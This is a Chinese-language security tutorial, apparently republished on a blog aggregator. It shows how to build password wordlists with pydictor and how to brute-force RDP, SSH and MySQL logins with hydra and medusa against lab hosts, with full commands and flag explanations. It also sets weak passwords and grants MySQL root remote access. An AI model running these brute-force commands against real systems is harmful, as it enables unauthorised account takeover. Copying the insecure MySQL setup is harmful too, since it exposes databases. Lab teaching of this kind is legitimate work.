暴力破解常见的服务器

这篇具有很好参考价值的文章主要介绍了暴力破解常见的服务器。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

使用 pydictor 生成自己的字典工具

pydictor 它可以帮助我们快速的生成普通爆破字典、基于网站内容的自定义字典、社会工程学字典等等一系列高级字典
还可以使用内置工具,对字典进行安全删除、合并、去重、合并并去重、高频词筛选
生成独一无二的高度定制、高效率和复杂字典,生成密码字典的好坏和你的自定义规则、能不能熟练使用pydictor有很大关系

兼容性强python 2.7版本还是python 3.4 以上版本,pydictor都可以在Windows、Linux 或者是Mac上运行

pydictor下载

https://github.com/LandGrey/pydictor/

liunx下载使用

git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git
cd pydictor/
chmod +x pydictor.py
python pydictor.py

常用的参数说明

-base Type 
   d digital [0 - 9] # digital [ˈdɪdʒɪtl] 数字的 
   L lowercase letters [a - z] # lowercase ['ləʊəˌkeɪs] 小写字母;letters [ˈletəz] 信,字母 
   c capital letters [A - Z] # capital [ˈkæpɪtl] 大写的 
-o 指定字典存储的位置 
--len 长度位数
-char '@#$%^&*abcdefg12345678' 有特殊字符的自定义字符集字典
--head Pa5sw0rd  生成以 Pa5sw0rd 开头

插件型字典 (可自己根据 API 文档开发)

1. 一段时间内生日字典
python pydictor.py -plug birthday 19800101 20001231 --len 6 8

2. 身份证后4/6/8位字典
python pydictor.py -plug pid4
python pydictor.py -plug pid6 --encode b64
python pydictor.py -plug pid8 --encode sha1 -o pid8.txt
3. 网页原始关键词字典
python pydictor.py -plug scratch                             用/funcfg/scratch.sites 文件中的多行 url 作为输入
python pydictor.py -plug scratch http://www.example.com
内置工具(可自己根据API文档开发)
1. 字典合并工具
python pydictor.py -tool combiner /my/mess/dir

2. 字典比较工具
python pydictor.py -tool comparer big.txt small.txt

3. 词频统计工具
python pydictor.py -tool counter s huge.txt 1000
python pydictor.py -tool counter v /tmp/mess.txt 100
python pydictor.py -tool counter vs huge.txt 100 --encode url -o fre.txt
4. 字典处理工具
python pydictor.py -tool handler raw.txt --tail @awesome.com --encode md5
python pydictor.py -tool handler raw.txt --len 6 16 --occur "" "=6" "<0" --encode b64 -o ok.txt
5. 安全擦除字典工具
python pydictor.py -tool shredder                    擦除当前输出目录下所有字典文件
python pydictor.py -tool shredder base                  擦除当前输出目录下所有以"base"开头的字典文件
python pydictor.py -tool shredder /data/mess
python pydictor.py -tool shredder D:\mess\1.zip
6. 合并去重工具
python pydictor.py -tool uniqbiner /my/all/dict/

7. 字典去重工具
python pydictor.py -tool uniqifer /tmp/dicts.txt --output /tmp/uniq.txt
8. 多字典文件组合工具
python pydictor.py -tool hybrider heads.txt some_others.txt tails.txt

文档使用请参照:
https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md

使用 hydra 工具在线破解系统用户密码

使用 hydra 破解 windows 7 远程桌面密码

Windows 远程桌面使用的 rdp 协议,默认端口是 3389,系统中默认是没有开启远程桌面服务
的,我们需要手动开启。
1)开始->运行-> 输入: sysdm.cpl 打开高级系统设置
暴力破解常见的服务器,网络安全专栏,服务器,运维
暴力破解常见的服务器,网络安全专栏,服务器,运维
2)同样通过 nmap 扫描 3389 端口确保服务开启。

nmap 192.168.1.56 -p 3389

暴力破解常见的服务器,网络安全专栏,服务器,运维
3)暴力破解远程桌面密码

hydra -l administrator -P m.txt rdp://192.168.1.56 -vV 

暴力破解常见的服务器,网络安全专栏,服务器,运维
4)通过远程桌面进行连接
开始运行输入 mstsc
暴力破解常见的服务器,网络安全专栏,服务器,运维
暴力破解常见的服务器,网络安全专栏,服务器,运维
暴力破解常见的服务器,网络安全专栏,服务器,运维
暴力破解常见的服务器,网络安全专栏,服务器,运维
5)远程连接成功。

注:如果目标系统用户正在使用操作系统,那么远程连接之后目标用户会被锁定。

使用 hydra 工具破解 ssh 服务 root 用户密码

1)首先修改一下 linux 主机的密码确保我们字典中存在正确的密码。

[root@xuegod63 ~]# passwd 
Changing password for user root. 
New password: 123456 
BAD PASSWORD: The password is shorter than 8 characters 
Retype new password: 123456 
passwd: all authentication tokens updated successfully. 

2)使用 hydra 工具进行破解 root 密码

hydra -l root -P m.txt -t 4 ssh://192.168.1.63 -e nsr -vV 

以上参数说明:
-t 通过 -t 参数来指定线程数默认是 16 会造成服务器拒绝连接。切记不能太快。
-e nsr 参数: 该-e 表示提供了更多测试选项。nsr 后面的字母对应更多的测试方式。
n 是尝试空密码登录
s 是将用户名作为密码登录
r 是将用户名反过来作为密码登录。 如:用户名是 root,那么会使用 toor 尝试破解。

暴力破解常见的服务器,网络安全专栏,服务器,运维

使用 Medusa 工具在线破解

Medusa 简介

官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。
软件下载地址:https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

medusa参数说明

medusa 命令选项:常用参数标红 
-h [TEXT] #目标 IP 
-H [FILE] #目标主机文件 
-u [TEXT] #用户名 
-U [FILE] #用户名文件 
-p [TEXT] #密码 
-P [FILE] #密码文件 
-C [FILE] #组合条目文件 
-O [FILE] #文件日志信息 
-e [n/s/ns] #n 意为空密码,s 意为密码与用户名相同 
-M [TEXT] #模块执行名称 
-m [TEXT] #传递参数到模块 
-d #显示所有的模块名称 
-n [NUM] #使用非默认端口 
-s #启用 SSL 
-r [NUM] #重试间隔时间,默认为 3 秒 
-t [NUM] #设定线程数量 
-L #并行化,每个用户使用一个线程 
-f #在任何主机上找到第一个账号/密码后,停止破解 
-q #显示模块的使用信息 
-v [NUM] #详细级别(0-6) 
-w [NUM] #错误调试级别(0-10) 
-V #显示版本 
-Z [TEXT] #继续扫描上一次 
-F #破解到一个正确的密码即退出 

Medusa 工具破解 linux root 用户登录密码

medusa -M ssh -h 192.168.1.63 -e ns -F -u root -P m.txt 

暴力破解常见的服务器,网络安全专栏,服务器,运维

实战: host.txt 文件中是目标主机名称或者 IP 地址,user.txt 文件中指定需要暴力破解的用户
名,字典使用“m.txt”。使用 8000 进程,同时暴力破解。

参数: 
-t [NUM] 设定子进程数量 
-O ssh.log 可以将成功破解的记录记录到文件中 
medusa -M ssh -h 192.168.1.63 -u root -P ./m.txt -t 8 -O ./ssh.log 

Medusa 破解 Mysql root 用户登录密码

Mysql 授权 root 用户允许远程登录

mysql -uroot -p123456 
MariaDB [(none)]> grant all privileges on *.* to 'root'@'%'identified by '123456' with grant option; 
MariaDB [(none)]> exit 

进行暴力破解

medusa -M mysql -h 192.168.1.63 -e ns -F -u root -P m.txt 

暴力破解常见的服务器,网络安全专栏,服务器,运维
验证远程登录 mysql 数据库文章来源地址https://www.toymoban.com/news/detail-814278.html

 mysql -uroot -p123456 -h192.168.1.63 
MariaDB [(none)]> show databases; 

到了这里,关于暴力破解常见的服务器的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全进阶学习第六课——服务器解析漏洞

    解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web服务器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞 影响范围:2.4.0~2.4.29版本 此漏洞形成的根本原因,在于 , 正则表达式中 , 正则表达式中 , 正则表达式中 不仅匹配字符串结尾位置,也可以匹配n 或 r ,在解

    2024年02月12日
    浏览(49)
  • 服务器Ubuntu系统----网络安全ufw规则配置

    由于服务器近期频繁遭到一个国外ip的攻击,导致服务器故障了两次,瘫痪了一次: 1.挖矿病毒入侵,导致GPU高频占用; 2.驱动被恶意破坏,导致无法安装软件; 3.系统文件损坏,导致虚拟机无法正常启动; 也是初次使用虚拟化的服务器,因此学习了一下防火墙的配置方法,

    2023年04月08日
    浏览(52)
  • 网络安全笔记-day5,服务器远程管理

    windows远程有两种类型: 1.远程桌面(图形化) 2.telnet(命令行) 准备两台虚拟机,我用的是winsowsXP和windowsServer2003 1.将两台设备连接到一个交换机下 2.配置IP地址 windowsXP ip:192.168.1.2 子网掩码:255.255.255.0 windowsServer2003 ip:192.168.1.3 子网掩码:255.255.255.0 测试是否能通信 打开winsow

    2024年04月16日
    浏览(59)
  • 网络安全进阶学习第四课——SSRF服务器请求伪造

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。 一般情况下, SSRF攻击的目标是从外网无法访问的内部系统,也就是内网。 利用一个可以发起网络请求的服务,当做跳板来攻击其它服务 SSRF 形

    2024年02月11日
    浏览(47)
  • 常见网络服务器并发模型

    近些年,随着互联网的大发展,高并发服务器技术也快速进步,从简单的循环服务器模型处理少量网络并发请求,演进到解决C10K,C10M问题的高并发服务器模型。本文主要以TCP为例,总结了几种常见的网络服务器模型的实现方式,优缺点,以及应用实例。 单线程循环 单线程循

    2024年02月08日
    浏览(49)
  • 探究代理服务器在网络安全与爬虫中的双重作用

    在如今高度互联的世界中,代理服务器已经成为网络安全和爬虫开发的关键工具。本文将深入探讨Socks5代理、IP代理、网络安全、爬虫、HTTP等,以揭示代理服务器在这两个领域中的双重作用,以及如何充分利用这些技术来保障安全和获取数据。 1. 代理服务器的基础 代

    2024年02月11日
    浏览(41)
  • 【网络安全】URL解析器混淆攻击实现ChatGPT账户接管、Glassdoor服务器XSS

    本文不承担任何由于传播、利用本文所发布内容而造成的任何后果及法律责任。 本文将基于ChatGPT及Glassdoor两个实例阐发URL解析器混淆攻击。 开始本文前,推荐阅读:【网络安全】Web缓存欺骗攻击原理及攻防实战 ChatGPT新增了\\\"分享\\\"功能,该功能允许用户与其他人公开分享聊天

    2024年02月20日
    浏览(56)
  • 传奇服务器常见的网络攻击方式有哪些?-版本被攻击

    常见的网络攻击方式有哪些?常见的网络攻击方式 :端口扫描,安全漏洞攻击,口令入侵,木马程序,电子邮件攻击,Dos攻击。 1.传奇服务器端口扫描: 通过端口扫描可以知道被扫描计算机开放了哪些服务和端口,以便发现其弱点,可以手动扫描,也可以使用端口扫描软件

    2024年02月04日
    浏览(53)
  • 探索不同类型的代理服务器 (代理 IP、socks5 代理)及其在网络安全与爬虫中的应用

    1. 代理服务器简介 代理服务器是一台充当中间人的服务器,它在客户端与目标服务器之间传递网络请求。代理服务器在不同层级上可以执行不同的任务,包括缓存、过滤、负载均衡和隐藏客户端真实IP地址等。在网络安全和爬虫领域,代理服务器具有重要的作用。 2. Socks5代理

    2024年02月11日
    浏览(52)
  • 常见web安全漏洞-暴力破解,xss,SQL注入,csrf

    1,暴力破解 原理:         使用大量的认证信息在认证接口进行登录认证,知道正确为止。为提高效率一般使用带有字典的工具自动化操作         基于表单的暴力破解 --- 若用户没有安全认证,直接进行抓包破解。 验证码绕过                           on s

    2023年04月12日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包